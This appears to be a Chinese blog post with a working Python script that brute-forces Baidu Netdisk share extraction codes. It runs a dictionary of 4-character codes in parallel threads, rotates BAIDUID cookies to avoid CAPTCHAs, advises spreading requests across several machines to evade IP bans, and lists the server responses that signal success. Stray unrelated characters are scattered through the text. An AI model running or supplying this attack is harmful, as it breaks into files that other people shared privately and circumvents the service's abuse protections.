目的:暴力破解百度網(wǎng)盤提取碼
提取碼組成:數(shù)字+字母(沒有大小寫之分)
數(shù)量級(jí):363636*36=1679616
方法:模擬瀏覽器輸入提取碼
運(yùn)行環(huán)境:Windows(10)、python 3.5.2痪蝇、dic.txt字典文件(https://drop.me/BNYprM)
Windows cmd 命令行中執(zhí)行以下命令(getbkey.py在當(dāng)前路徑亡问,否則請輸入其絕對路徑):
python getbkey "https://pan.baidu.com/share/init?shareid=1217313490&uk=2225629318"
getbkey.py 的主文件代碼如下
#coding:utf-8
import re,sys,time,requests,string,hashlib,threading
from sys import argv
keyone,keytwo= argv
print ("分享網(wǎng)頁地址是:", keytwo)
def getBAIDUID():#通過接口嘗試驗(yàn)證碼時(shí)需要BAIDUID畔咧,但只能用三次就需要驗(yàn)證碼了。這里是通過requests.get()模擬打開百度獲取cookie中的BAIDUID,用requests.get()每次可以獲得不同BAIDUID
bdua={
"Host":"www.baidu.com",
"Connection":"keep-alive",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Accept-Encoding":"gzip, deflate, sdch",
"Accept-Language":"zh-CN,zh;q=0.8"
}
baiduid=requests.get("https://www.baidu.com",headers=bdua)
return(re.findall("'Set-Cookie': '(.*?);",str(baiduid.headers))[0])
def main():
URL=keytwo.replace('init','verify')
t = int(time.time() * 1000)#13位時(shí)間戳
URL=URL+"&t="+str(t)+"&bdstoken=137f8d2d20098d01f579bd720f5e5531&channel=chunlei&clienttype=0&web=1&app_id=250528&logid=MTUwNDQwNzk0MTI2NjAuNzExODQyNzI1MDMzMjE4"
print(URL)#建議URL的t后面的部分替換成自己的...可以通過瀏覽器F12得到的
for n in range(0,35):
t=threading.Thread(target=singledog,args=(n,URL))
t.start()#每5秒開啟一個(gè)線程想鹰,將字典分為36個(gè)部分同時(shí)執(zhí)行以提高效率胎围,但是電腦配置過低的話吁系,時(shí)間一長有的線程可能自己會(huì)掛掉,暫時(shí)沒想到解決辦法白魂,建議將線程數(shù)減少
time.sleep(5)#沒有一定時(shí)間間隔會(huì)并發(fā)執(zhí)行多線程汽纤,直接爆內(nèi)存
def singledog(n,URL):
i=0
f = open('C:\dic.txt', "r")#dic.txt是0000-zzzz的字典按行讀取,此處為絕對路徑
for payload in f.readlines()[n*36*36*36:(n+1)*36*36*36]:#通過傳入的n分段讀取字典內(nèi)容福荸,可視情況更改
payload = payload.strip('\n')
print (str(payload));i=i+1
payloaddata={
"pwd":payload,
"vcode":"",
"vcode_str":""
}
if i%3==1:#第一次需要獲取BAIDUID冒版,所以余一執(zhí)行一次。另外每3次需要更新一次BAIDUID逞姿,否則會(huì)出現(xiàn)驗(yàn)證碼
ua = {
"Host":"pan.baidu.com",
"Connection":"keep-alive",
"Content-Length":"26",
"Pragma":"no-cache",
"Cache-Control":"no-cache",
"Accept":"*/*",
"Origin":"https://pan.baidu.com",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Referer":keytwo,
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"zh-CN,zh;q=0.8",
"Cookie":"PANWEB=1; "+getBAIDUID()#這里更新BAIDUID
}
a = requests.post(url=URL,data=payloaddata,headers=ua).cookies;
if "BDCLND" in a:
print (str(a)+'\n'+'OK')
f = open("out.txt", "w+")#成功后把提取碼保存到當(dāng)前路徑的out.txt文件中
f.write(payload)
f.close
exit()
f.close()
main()
其他:
- 新手還沒學(xué)標(biāo)準(zhǔn)格式辞嗡,代碼就湊和用..,
- 更新UA部分應(yīng)該還可以簡化?
- 單線程的話在找到提取碼后會(huì)結(jié)束滞造,但是多線程不知道怎么在一個(gè)線程得到提取碼后結(jié)束其他線程...
- 命令行中的鏈接必須是長鏈接不能是http://pan.baidu.com/s/1c1Hs7s8這樣的短連接(其實(shí)瀏覽器打開短連接就是長鏈接了...)
- 大概8線程比較穩(wěn)续室?建議幾個(gè)機(jī)子一起跑,同一個(gè)IP太多次請求會(huì)可能被拉黑
- 失敗返回(密碼錯(cuò)誤){"errno":-9,"err_msg":"","request_id":5262813406111293057}
- 驗(yàn)證碼錯(cuò)誤
{"errno":-62,"err_msg":"","request_id":5262813406111293057} - 成功返回
{"errno":0,"err_msg":"","request_id":5262846836500273100}
附上上面命令行例子中的運(yùn)行示意圖
折騰太多...已被拉黑(我也不知道什么時(shí)候)...如圖:
Paste_Image.png
正常情況下輸入錯(cuò)誤的返回:
Paste_Image.png
返回的頭部數(shù)據(jù):
Paste_Image.png
抓包情況:
Paste_Image.png
然后這是輸入正確的時(shí)候谒养,你會(huì)發(fā)現(xiàn)返回的cookie中有一項(xiàng)是set-cookie:
Paste_Image.png
一下是運(yùn)行情況演示(單線程):
Paste_Image.png
Paste_Image.png
Paste_Image.png
